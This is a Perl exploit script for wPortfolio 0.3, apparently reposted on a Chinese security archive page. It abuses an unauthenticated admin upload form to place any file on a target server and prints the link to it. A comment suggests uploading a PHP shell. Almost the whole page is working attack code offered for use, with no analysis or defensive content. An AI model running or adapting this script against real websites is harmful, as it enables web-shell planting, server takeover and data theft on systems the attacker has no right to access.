Portfolio <= 0.3 Remote Arbitrary File Upload Exploit
|
来源:osirys[at]live[dot]it 作者:Osirys 发布时间:2008-11-20
|
|
#!/usr/bin/perl
# Name: wPortfolio <= 0.3 Arbitrary File Upload Exploit # Script Name: wPortfolio 0.3 # Download: http://sourceforge.net/project/downloading.php?group_id=244834&use_mirror=kent&filename=wPortfolio.zip&80791070 # Vulnerability: Arbitrary File Upload # Vulnerable page: /admin/upload_form.php # * You can upload everything you want, why not a php shell? ^^ # Author: Osirys # Contact: osirys[at]live[dot]it # Proud to be Italian # Thx: athos
use LWP::UserAgent; use HTTP::Request::Common;
my $path = "/admin/upload_form.php"; my $d_fold = "/admin/tmp/"; my($host,$file) = ($ARGV[0],$ARGV[1]);
($host,$file) || help("-1"); cheek($host) == 1 || help("-2"); &banner; my $url = $host.$path;
my $ua = LWP::UserAgent->new; my $re = $ua->request(POST $url, Content_Type => 'form-data', Content => [file_to_upload => [$file]] );
if ($re->is_success) { print "[+] Uploaded ! \n"; print "[+] Link: ".$host.$d_fold.$file." \n"; } else { print "[-] Upload failed ! \n"; }
sub cheek() { my $host = $_[0]; if ($host =~ /http:\/\/(.*)/) { return 1; } else { return 0; } }
sub banner { print "\n". " ========================================== \n". " wPortfolio 0.3 Arbitrary File Upload \n". " Author: Osirys \n". " osirys[at]live[dot]it \n". " Proud to be italian \n". " ========================================== \n\n"; }
sub help() { my $error = $_[0]; if ($error == -1) { &banner; print "\n[-] Cheek that you typed the hostname address and the local file to upload !\n"; } elsif ($error == -2) { &banner; print "\n[-] Bad hostname address !\n"; } print "[*] Usage : perl $0 http://hostname/cms_path local_file_to_upload \n\n"; exit(0); }
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|